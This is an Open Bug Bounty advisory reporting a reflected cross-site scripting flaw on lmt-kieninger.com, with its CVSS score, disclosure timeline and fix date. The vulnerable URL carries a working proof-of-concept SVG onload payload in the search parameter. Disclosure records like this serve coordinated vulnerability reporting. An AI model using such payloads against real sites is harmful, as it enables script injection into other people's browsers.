lmt-kieninger.com XSS vulnerability

2017-11-11T22:19:00
ID OBB:410658
Type openbugbounty
Reporter badmaxx
Modified 2018-02-10T14:32:00

Description

Open Bug Bounty ID: OBB-410658

Description| Value
---|---
Affected Website:| lmt-kieninger.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.lmt-kieninger.com/search/?tx_lmt_pi[__referrer][%40extension]=Lmt&tx;_lmt_pi[__referrer][%40controller]=Banner&tx;_lmt_pi[__referrer][%40action]=searchForm&tx;_lmt_pi[__referrer][arguments]=YTowOnt9139ea3e889aaa86e51f6f26d1612491d04a1b2b4&tx;_lmt_pi[__referrer][%40request]=a%3A3%3A{s%3A10%3A%22%40extension%22%3Bs%3A3%3A%22Lmt%22%3Bs%3A11%3A%22%40controller%22%3Bs%3A6%3A%22Banner%22%3Bs%3A7%3A%22%40action%22%3Bs%3A10%3A%22searchForm%22%3B}bf0f9361cd64c686006dfbc687f78488eca0fd15&tx;_lmt_pi[__trustedProperties]=a%3A1%3A{s%3A6%3A%22phrase%22%3Bi%3A1%3B}2d6fb36d9ced9abaf1cc08d6f3966a4d3b64b763&tx;_lmt_pi[phrase]=%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E&no;_cache=1
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 11 November, 2017 22:19 GMT
Vulnerability Verified:| 11 November, 2017 22:22 GMT
Website Operator Notified:| 11 November, 2017 22:22 GMT
Vulnerability Published:| 11 November, 2017 22:22 GMT[without any technical details]
Vulnerability Fixed:| 10 February, 2018 14:32 GMT
Public Disclosure:| 10 February, 2018 14:32 GMT